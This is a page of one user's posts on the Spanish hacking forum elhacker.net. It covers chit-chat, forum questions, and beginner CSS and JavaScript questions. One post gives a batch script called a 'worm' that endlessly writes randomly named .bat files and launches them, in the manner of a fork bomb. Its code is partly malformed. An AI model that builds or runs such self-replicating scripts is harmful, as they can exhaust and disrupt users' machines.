elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 [9]
81  Foros Generales / Foro Libre / Cosas que os desilusionan o joden el día y cosas que os alegran el día. en: 22 Diciembre 2012, 19:39 pm
Decid las cosas que os desilusionan joden el día y las que os lo alegran.  ;D

Empiezo yo:
A mi me alegra el día encontrarme dinero en los bolsillos de una chaqueta que hace tiempo que no uso. Y me jode que me presten un boli o un lápiz e inconscientemente empezar a mordisquearlo.
82  Programación / Scripting / [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 16:52 pm
El código es este:

Código
  1. @echo off
  2. title VM
  3. color 02
  4. :go
  5. set U=%random%%random%%random%%random%%random%%random%%random%%random%%random%
  6. echo @echo off>>%U%.bat
  7. echo set T=%random%%random%%random%%random%%random%%random%%random%%random%%random%>>%U%.bat
  8. echo :go>>%U%.bat
  9. echo @echo off>>%U%>>%T%.bat
  10. echo start>>%U%.bat
  11. echo goto go>>%U%.bat
  12. start %U%.bat
  13. goto go


Como entenderéis no lo voy a probar. Pero me gustaría saber si podría funcionar.
Especialmente me gustaria saber si se pueden hacer cosas como esta:
Código
  1. echo echo echo hola>>x.bat>>y.bat

(Entonces podría hacer el worm mas complicado)


PD: No pretendo hacer nada malo con esto.



:D<(Un saludo y gracias por leer!!)
83  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Por que algunos nombres aparecen con colores en el indice? en: 22 Diciembre 2012, 12:45 pm
Cuando estoy en el indice de foros y bajo para ver los usuarios conectados en los últimos 20 minutos a veces uno aparece en color azul, otro en verde... ¿Por que se produce esto? ¿Por ser de una jerarquía mas alta (Moderador, moderador global...)? ¿O simplemente se puede modificar el color a tu gusto? Si es la segunda me gustaria saber como.

:D<(Un saludo y gracias por leer!!)
84  Foros Generales / Sugerencias y dudas sobre el Foro / [¿Sugerencia?] ¿Se eliminan las cuentas abandonadas? en: 21 Diciembre 2012, 20:52 pm
¿Se eliminan las cuentas de personas que solo entraron a aqui para preguntar una cosa y ya no la usan?
Si no es asi se podria hacer que cada cierto tiempo seguido sin entrar en la cuenta enviaran un mensaje al correo del usuario y a todo lo que se conozca diciendo que si en un plazo de tiempo no entra su cuenta sera eliminda.

Saludos y gracias por leer.  ;D
85  Programación / Desarrollo Web / [CSS] Esquinas bordeadas. ¿Como? No lo entiendo. en: 20 Diciembre 2012, 21:04 pm
Código
  1. <html>
  2. <head>
  3. <title>Nyan</title>
  4. </head>
  5. <STYLE type="text/css">
  6. </STYLE>
  7. <body>
  8. <DIV style="position: fixed; left: 10px; top: 10px; border: 4px
  9. soild blue; color: white; background-color: black; width: 400px">
  10. ¿Comoo?
  11. </DIV>
  12. </body>
  13. </html>
  14.  



He investigado un poco y se que hay que poner esto:

Código
  1. -webkit-border-radius:  20px;
  2. -moz-border-radius: 20px;
  3. border-radius: 20px;
  4.  
Y mas tipos... ( http://www.miguelmanchego.com/2010/css3-esquinas-redondeadas/ )

Sonara muy tonto. Pero no consigo saber donde se tiene que poner ese fragmento de código.

Gracias por leer y feliz "fin del mundo"!!  ;D
86  Programación / Desarrollo Web / [javascript] Problema en: 18 Diciembre 2012, 21:54 pm
Código
  1. <html>
  2. <head>
  3. <title>Se supone que es sencillo...</title>
  4. </head>
  5. <script type="text/javascript">
  6. n=0;
  7. function suma()
  8. {
  9. n++;
  10. document.write(n);
  11. }
  12. </script>
  13. <body onclick="suma()">
  14. </body>
  15. </html>
  16.  


Problema:
Cuando pulso el botón izquierdo del ratón aparece un 1 y ya no vuelve a pasar nada. Se supone que puede pulsarse infinitas veces y que aparecerá el numero de veces que lo has pulsado.


Saludos!!  ;D
87  Foros Generales / Sugerencias y dudas sobre el Foro / Por que tengo 0 mensajes? en: 18 Diciembre 2012, 18:25 pm
Desde mi cuenta y como visitante veo que el las respuestas que doy pone que tengo 0 mensajes. Pero ya llevo 5. ¿A que se debe eso? ¿Como lo puedo arreglar?   :huh:
88  Foros Generales / Foro Libre / ¿A que edad empezaste a interesarte por la informatica? en: 18 Diciembre 2012, 07:59 am
Podeis poner aqui a que edad os empezasteis a interesar, cuanto tiempo ha pasado desde entonces, porque empezasteis, lo primero que aprendisteis (HTML, batch, python...) y mas cosas que querais!  :D
Páginas: 1 2 3 4 5 6 7 8 [9]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines